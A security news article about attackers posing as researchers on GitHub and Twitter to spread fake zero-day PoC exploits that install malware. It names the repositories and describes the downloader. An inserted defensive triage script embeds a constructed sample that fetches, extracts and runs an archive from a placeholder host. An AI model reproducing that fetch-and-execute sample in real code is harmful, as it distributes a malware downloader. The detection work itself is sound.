Heimdal
Cybercriminals are using fake accounts on Twitter and GitHub to spread fake proof-of-concept (PoC) exploits for zero-day vulnerabilities. They impersonate cybersecurity researchers in order to push malware to Windows and Linux users.

How the Scam Works

These impersonators pretend to work at a fake cybersec company, named “High Sierra Cyber Security”, or even at well-known organizations. They create GitHub repositories, promoting them on Twitter to gain the victim’s trust. To appear legitimate, the fake accounts use a convincing profile photo.

They pretend to offer exploits for zero-day flaws in popular software like Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. Threat actors seem tenacious and open new accounts and repositories after the removal of the old ones.

These GitHub repositories are malicious and should be avoided:

  1. github.com/AKuzmanHSCS/Microsoft-Exchange-RCE
  2. github.com/MHadzicHSCS/Chrome-0-day
  3. github.com/GSandersonHSCS/discord-0-day-fix
  4. github.com/BAdithyaHSCS/Exchange-0-Day
  5. github.com/RShahHSCS/Discord-0-Day-Exploit
  6. github.com/DLandonHSCS/Discord-RCE
  7. github.com/SsankkarHSCS/Chromium-0-Day

Also, these Twitter accounts are fake:

  • twitter.com/AKuzmanHSCS
  • twitter.com/DLandonHSCS
  • twitter.com/GSandersonHSCS
  • twitter.com/MHadzicHSCS

The campaign targets cybersecurity researchers and companies that do vulnerability research. These fake accounts were first discovered by VulnCheck in May 2023.

Details About the Malware

The malicious payload was a Python script (‘poc.py’) functioning as a malware downloader for Linux and Windows systems.

The script downloads a ZIP archive from an external URL to the victim’s computer depending on their operating system, with Linux users downloading ‘cveslinux.zip’ and Windows users receiving ‘cveswindows.zip.’

The malware is saved to the Windows %Temp% or the Linux /home/<username>/.local/share folders, extracted, and executed.
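As an added example (not code from the article, Heimdal or VulnCheck), the following static triage walks an untrusted PoC script's AST before anyone runs it and flags the downloader chain described above: OS branching, a remote fetch, a drop into a temp or user data directory, archive extraction and process execution. The embedded sample script is a constructed stand-in for the ‘poc.py’ described, not the real payload, and its URL is a placeholder.

```python
import ast
# Dotted names that realise each step of the downloader chain the article describes.
# Heuristic only: aliased imports ("from subprocess import run") are not resolved.
INDICATORS = {
    "os_detection": {"platform.system", "sys.platform", "os.name"},
    "remote_fetch": {"urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get"},
    "drop_dir": {"tempfile.gettempdir"},
    "archive_extract": {"zipfile.ZipFile", "shutil.unpack_archive", "tarfile.open"},
    "process_exec": {"subprocess.run", "subprocess.Popen", "subprocess.call", "os.system", "os.startfile"},
}
DROP_DIR_HINTS = ("temp", "/tmp", ".local/share", "appdata")  # substrings of string literals naming drop locations

def _dotted(node):
    """Rebuild 'pkg.mod.attr' from an Attribute chain; '' if the root is not a plain Name."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else ""

def triage(source):
    """Map each indicator found in the script to the sorted evidence that triggered it."""
    found = {}
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Attribute):
            name = _dotted(node)
            for label, names in INDICATORS.items():
                if name in names:
                    found.setdefault(label, set()).add(name)
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if any(h in node.value.lower() for h in DROP_DIR_HINTS):
                found.setdefault("drop_dir", set()).add(node.value)
    return {k: sorted(v) for k, v in found.items()}

def verdict(found):
    """Fetch + extract + execute together is a downloader, whatever the README claims."""
    if {"remote_fetch", "archive_extract", "process_exec"}.issubset(found):
        return "downloader-like"
    return "review" if found else "no indicators"

# Constructed stand-in for the 'poc.py' described in the article (not the real sample); the URL is a placeholder.
SAMPLE_POC = '''
import platform, urllib.request, zipfile, subprocess, os
dest = os.path.join(os.environ["TEMP"], "cveswindows.zip") if platform.system() == "Windows" else os.path.expanduser("~/.local/share/cveslinux.zip")
urllib.request.urlretrieve("http://PLACEHOLDER.invalid/" + os.path.basename(dest), dest)
zipfile.ZipFile(dest).extractall(os.path.dirname(dest))
subprocess.Popen([dest[:-4]])
'''
```

Running `verdict(triage(SAMPLE_POC))` returns "downloader-like"; a script that merely branches on the OS returns "review", so a human still looks at it.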

Over 60% of antivirus engines on VirusTotal have identified the Windows binary (‘cves_windows.exe’) that is included in the ZIP. Only three scanners were able to detect the far stealthier Linux binary (‘cves_linux’).

Although it is unclear what type of malware the payload carries, both executables install a TOR client, with the Windows version showing some password-stealing trojan features.

Targeting Security Experts

This is not the first campaign of this kind. Lazarus, a North Korean state-sponsored group, launched a similar one in 2021. To target researchers with malware and zero-days, they developed false vulnerability researcher profiles on social media.

More recently, academics found thousands of repositories on GitHub offering fake proof-of-concept (PoC) exploits for various vulnerabilities, some of them infecting users with malware, malicious PowerShell, obfuscated info-stealer downloaders, Cobalt Strike droppers, and more.

By targeting the cybersecurity community, threat actors can obtain vulnerability research that they can then use in their own attacks. Furthermore, the malware may frequently grant initial access to a cybersecurity firm’s network, opening the door to further data theft and extortion attempts.

Author Profile

Andreea Chebac

Digital Content Creator

Andreea is a digital content creator within Heimdal® with a great belief in the educational power of content.
